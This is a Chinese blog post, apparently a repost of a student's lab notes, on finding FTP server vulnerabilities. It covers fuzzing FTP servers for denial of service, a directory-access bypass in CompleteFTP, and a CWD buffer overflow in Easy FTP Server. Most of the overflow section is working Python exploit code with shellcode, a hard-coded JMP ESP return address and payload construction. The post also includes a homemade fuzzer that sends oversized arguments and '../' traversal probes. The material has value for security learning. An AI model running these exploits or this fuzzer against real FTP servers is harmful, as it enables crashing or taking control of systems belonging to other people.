FTP的漏洞挖掘

最新推荐文章于 2024-05-06 19:00:00 发布
最新推荐文章于 2024-05-06 19:00:00 发布
阅读量589 收藏 4
点赞数
文章标签: 操作系统 python
原文链接:http://www.cnblogs.com/Ccmr/p/7340496.html
版权

 

FTP协议简介

漏洞挖掘手记1:DOS

  原理是对FTP协议中的命令及命令参数进行脏数据替换,构造畸形FTP命令并发送给被测试FTP服务程序。

下了一个FTPFuzz,界面丑绝人寰

开启Quick ‘n Easy FTP Server

开启后,做实验并没有崩溃,不能触发DOS攻击。可能和SP3有关

漏洞挖掘手记2:访问权限

在WIN7中开启CompleteFTP Server

登陆不了,新建个账户吧

FTP 目录在本地系统中的“/Home/user”

所以这这就绕过了?

easyFTP 缓冲区溢出漏洞

  Easy FTP Server执行CWD时未对参数进行长度有效性校验,传递超长参数会造成缓冲区溢出.

启动easyFTP,开启后生成三个XML配置文件和一个文件夹

挂连上OD,按F9继续运行

实验失败:

代码如下:

import socket
import sys
def ftp_test(ip,port):
    target = ip
    port = port
    shellcode = ('\x50\x20'   
'\xD9\xEE'             
'\xD9\x74\x24\xF4'       
'\x58'                  
'\x83\xC0\x1b'       
'\x33\xC9'            
'\x8A\x1C\x08'         
'\x80\xF3\x11'          
'\x88\x1C\x08'        
'\x41'               
'\x80\xFB\x90'     
'\x75\xF1'    
'\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d'    
'\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42'    
'\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a'    
'\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84'    
'\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48'    
'\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b'    
'\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64'    
'\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12'    
'\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca'    
'\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41'    
'\x42\xee\x46\xed\x42\xee\x46\xe9\x81')
    buffer =  shellcode+'a'*(268-198)+'\xa0\x6f\x5f\x7d'
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((target,port))
        print "[+] Connected!"
    except:
        print "[!] Connection failed!"
        sys.exit(0)
    s.recv(1024)
    s.send('USER anonymouss\r\n')
    s.recv(1024)
    s.send('PASS anonymous\r\n')
    s.recv(1024)
    print "[+] Sending buffer..."
    s.send('CWD' + buffer + '\r\n')
    try:
        s.recv(1024)
        print "failed"
    except:
        print "ok"
    s.close()
if __name__ == '__main__':
    ftp_test("192.168.211.129", 21)

转去网上搜索别人的代码,他人代码用到的是 pwntools 包,在windows上安装不了,我笑了。呵呵哒。此处贴上他人利用的代码

from pwn import *
p = remote("192.168.253.156", 21)
jmp_esp = 0x7E429353
shellcode = "\x33\xDB\x53\x68\x6E\x63\x68\x21\x68\x74\x62\x72\x61\x68\x67\x69\x61\x6E\x8B\xC4\x53\x50\x50\x53\xB8\xEA\x07\x45\x7E\xFF\xD0"
nop = "\x90" * 12
payload = 'a' * 268 + p32(jmp_esp) +  nop + shellcode
print p.recv(1024)
p.sendline("USER anonymous")
print p.recv(1024)
p.sendline("PASS anonymous")
print p.recv(1024)
p.sendline("CWD " + payload)
p.interactive()

 继续接着做实验 ,成功,排查原因:代码少写一个空格。所以此处提醒大家,注意细节。

执行CWD命令后发生缓冲区溢出,直接找CWD命令,使用OD查找ws2_32.Rev,但是怎么找呢?使用IDA(不会用啊,感觉又得恶补一下了)每天问别人,今天先把攻击的代码写了

此处暂停

 

 此处修改为jmp esi

中文版xp用不了

贴上最终代码

import socket
import sys
import time
def ftp_test(ip,port):
    target = ip
    port = port
    jmp_esp = 0x7E429353
    shellcode = "\x33\xDB\x53\x68\x6E\x63\x68\x21\x68\x74\x62\x72\x61\x68\x67\x69\x61\x6E\x8B\xC4\x53\x50\x50\x53\xB8\xEA\x07\x45\x7E\xFF\xD0"
    nop = "\x90" * 12
    buffer = 'a' * 268 + '\x53\x93\x52\x7E' +  nop + shellcode
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((target,port))
        print "[+] Connected!"
    except:
        print "[!] Connection failed!"
        sys.exit(0)
    time.sleep(1)
    s.send('USER anonymous\r\n')
    s.recv(1024)
    s.send('PASS anonymous\r\n')
    s.recv(1024)
    print "[+] Sending buffer..."
    s.send('CWD ' + buffer + '\r\n')
    try:
        h = s.recv(1024)
        print h
        print "failed"
    except:
        print "ok"
    s.close()
if __name__ == '__main__':
    ftp_test("192.168.211.129", 21)

 

Fuzz DIY

# -*- coding: utf-8 -*-
# @Date    : 2017-02-19 21:44:12
# @Author  : giantbranch (giantbranch@gmail.com)
# @Link    : http://blog.csdn.net/u012763794?viewmode=contents
# @Link    : http://www.giantbranch.cn/
import sys
import socket
buffer = 'a' * 4
fuzzcmd = ['mdelete', 'cd', 'mkdir', 'delete', 'cwd', 'mdir', 'mput', 'mls', 'rename', 'site index' ]
if len(sys.argv) != 4:
    print "[*] Please input like this: python fuzzFtp.py 192.168.253.151 21 1"
    sys.exit(0)
target = sys.argv[1]
port = int(sys.argv[2])
mode = int(sys.argv[3])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print target
    print port
    con = s.connect((target, port))
    print "[*] Connected!"
except:
    print "[*] Connect failed!"
    sys.exit(0)
# 接受欢迎信息
s.recv(1024)
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS anonymous\r\n")
s.recv(1024)
j = 100
if mode ==1:
    print "[*] Sending payload..."
    for i in fuzzcmd:
        s.send(i + ' ' + buffer*j + '\r\n')
        s.send(i + ' ' + buffer*j*4 + '\r\n')
        s.send(i + ' ' + buffer*j*8 + '\r\n')
        s.send(i + ' ' + buffer*j*40 + '\r\n')
        s.send(i + ' ' + buffer + ' ' + buffer + '\r\n')
        try:
            s.recv(1024)
            print "[!] WuWu, Failed!"
        except :
            print "[+] Yeah! Maybe you find a Bug!"
if mode == 2:
    s.send('cd ../\r\n')
    ds = s.recv(50).find("550")
    if ds != -1:
        print "[+] Yeah! Maybe you can cd ../!"
if mode == 2:
    s.send('cd ..\\r\n')
    dss = s.recv(50).find("550")
    if dss != -1:
        print "[+] Yeah! Maybe you can cd ..\!"

运行完毕,服务端特别卡

未成功

 

转载于:https://www.cnblogs.com/Ccmr/p/7340496.html

dengyao6547
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FTP服务搭建
weixin_44818720的博客
05-03 416
部署FTP服务器 作用:FTP(文件传输协议)是internet 上仍常使用的最老的网络协议之一,它为系统提供了通过网络与远程服务器进行传输的简单方法在redhat entreprise linux 6 中。FTP 服务器包括的名称为 vsftp , 它代表 very secure file trandferprotocol damon 服务器名称也叫做 vsftpd 默认配置文件让 anonym...
FTP服务器漏洞
qq_35266419的博客
10-10 2888
题目 目标系统通过Serv-U搭建了一个FTP服务。请尝试利用软件的漏洞获取目标服务器系统的FLAG.txt文件内的flag值并提交。 题目分析 1.FTP服务器 (1)定义:FTP服务器(File Transfer Protocol Server)是在互联网上提供文件存储和访问服务的计算机,它们依照FTP协议提供服务。 FTP是File Transfer Protocol(文件传输协议)。顾名思...
6-1漏洞利用-FTP漏洞利用
山兔的博客
06-30 4001
文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。FTP使用21号端口。FTP在传输时,需要对应的用户用户分类:1、Real用户管理者在管理FTP服务器,为每一个用户创建对应名称的real用户或者是它有自己名称的用户,我们用户登录FTP服务器时,使用的是real用户的账号密码,这个时候,我们登录只能查看自己所在文件夹的内容,不能查看其它文件夹2、Administrator管理员登录之后,
4.1、漏洞利用-FTP漏洞
c10udz的博客
09-04 2000
ftp协议:文件传输协议,使用客户/服务器(C/S)模式,用于Internet上的控制文件的双向传输(上传下载),属于网络传输协议的应用层,使用21号端口。nmap --script vuln -p 21 192.168.12.129 //漏洞探测。nmap -p 21 192.168.12.129 //扫描靶机21端口是否开启。攻击机:kali、IP=192.168.12.128。//使用nc登录靶机,密码可为空或任意,大小写皆可。FTP文件传输格式:(1)ASCII(2)二进制。
网络安全漏洞深度剖析
最新发布
qingkahui24689的博客
05-06 823
2021年7月13日,美国微软威胁情报中心发布安全公告[1],文中指出黑客利用Serv-U 0day对极少数美国军工部门成功进行了攻击,同日Serv-U母公司solarwinds也发布安全公告[2],并针对最新大版本发布了补丁[3]。(注意:目前发布的补丁只针对最新的15.2.3大版本,且只能是付费用户才能下载安装补丁,非付费用户目前无法从官方渠道获取有效补丁。根据补丁比较和fuzzer,宁静之盾安全团队成功复现了该远程溢出漏洞,并能在实战环境下成功利用。
FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透
热门推荐
weixin_52347768的博客
05-05 1万+
漏洞扫描考察论文
端口漏洞之21(FTP)
初岄的博客
10-12 4358
FTP 是 File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文件传输协议”。用于 Internet 上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的 FTP 应用程序,而所有这些应用程序都遵守同一种协议用以传输文件。在 FTP 的使用当中,用户经常遇到两个概念:“下载”(Download)和 “上传”(Upload)。“下载”文件就是从远程主机拷贝文件至自己的计算机上;
ftp fuzzing工具
05-15
支持ftp漏洞挖掘,集成ftp专用fuzzing测试用例,只需输入ip和端口
浅谈D-Link系列路由器漏洞挖掘入门
10-02
本文将带你进入D-Link系列路由器漏洞挖掘的世界,让你了解如何从零开始探索路由器安全的奥秘。首先,我们来谈谈为什么要关注路由器漏洞以及如何进行准备工作。 D-Link系列路由器作为广泛使用的家用和小型企业设备,...
101web漏洞挖掘之任意文件读取漏洞1
08-03
4. **运维配置文件读取**:获取如Redis、Rsync、FTP、SSH的配置,可能揭示远程访问凭据。 5. **中间件配置文件读取**:读取WebLogic、Tomcat等中间件的密码文件,如WebLogic的控制台密码或Tomcat的`tomcat-users.xml...
从零开始学习软件漏洞挖掘系列教程第八篇:实战挖掘PCMan FTP服务器溢出1
08-03
1实验简介实验所属系列: 系统安全实验对象: 本科/专科信息安全专业相关课程及专业: 计算机网络实验时数(学分):2 学时实验类别: 实践实验类2 实验目的通过
windows下FTP匿名登录或弱口令漏洞及服务加固
09-30
FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为
Cisco_IOS_Router_Exploitation.pdf
08-07
Cisco IOS里有HTTP(S), FTP, TFTP, SSH, TELNET, 但是”For attackers seeking to gain control of important network infrastructure, such services are not of interest, as well-managed networks will not make...
FTP协议及相关漏洞
weixin_45253216的博客
03-09 4772
1.ftp简介 网络文件共享服务主流的主要有三种,分别是ftp,nfs,samba。 FTP是File Transfer Protocol(文件传输协议)的简称,用于internet上的控制文件的双向传输。 FTP也是一个应用程序,基于不同的操作系统有不同地FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,我们经常会遇到两个概念:下载和上传。 下载(Downloa...
未授权和敏感文件泄露
Fiverya的博客
02-03 1217
常见未授权和敏感文件泄露漏洞
服务攻防-协议漏洞-FTP&RDP&SSH&Rsync&ProFTPD&libssh&Openssh-Hydra工具使用&口令猜解&未授权访问
ran的博客
05-09 2089
▶工具下载地址▶工具简介Hydra是一种强大的网络登录破解工具,它可以尝试多种用户名和密码组合来尝试登录网络服务,例如SSH、FTP、Telnet、SMTP、POP3等等。Hydra支持多线程并发登录尝试,并能自动处理输入和输出,使其成为自动化扫描和攻击测试的理想工具。此外,Hydra还支持使用代理服务器、设置超时时间、支持多种协议等高级功能。Hydra通常被用于渗透测试和网络安全评估,以检测目标系统中可能存在的弱点和安全漏洞。
FTP协议简单分析既历史漏洞介绍
南迪叶先森
06-30 1248
来源:https://www.freebuf.com/vuls/272975.html 话说在前面 节日在家无聊看完了kali linux2这本书,对书中一些知识比较感兴趣,于是才有了这篇文章。 协议介绍 FTP(File Transfer Protocol)文件传输协议,在TCP/IP协议族中属于应用层协议运行于TCP协议之上是一种可靠的传输协议,主要功能用于实现用户间文件分发共享,以及网络管理者在进行设备版本升级、日志下载和配置保存等业务操作时,均会使用到FTP功能。ftp协议是采用C/S结构。也就.
kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞)
qq_58018041的博客
04-22 3566
#vsftpd源码包含后门漏洞#思路:开放21端口,并且vsftpd版本号为2.3.4#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。攻击机:kali :192.168.111.128靶机:Metasploitable2-Linux:192.168.111.132Metasploitable 的用户名和密码均为:msfadmin。
FTP-利用FTP后门漏洞
Myu_wzy的博客
09-24 817
一、实验原理 vsftpd手工触发漏洞: 当进行FTP认证时,如果用户名USER中包含" :) ",那么直接就触发监听6200端口的连接的shell 二、实验环境 目标主机:Metasploit2虚拟机 192.168.20.143 攻击主机: Kali2虚拟机 192.168.20.133 三、实验过程 先用nc连接靶机,并在进行FTP认证时,用户名包含" :) " 此时靶机的6200端口已经开启 由于nmap进行自动扫描时,默认不会扫描6200端口,所以需要我们手动扫描6.
python 制作ftp漏洞扫描
05-12
下面是一个基本的Python代码示例,可以用来扫描FTP服务器的漏洞: ```python import ftplib def check_ftp_vuln(hostname): try: ftp = ftplib.FTP(hostname) ftp.login('anonymous', 'anonymous') ftp.cwd('/...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值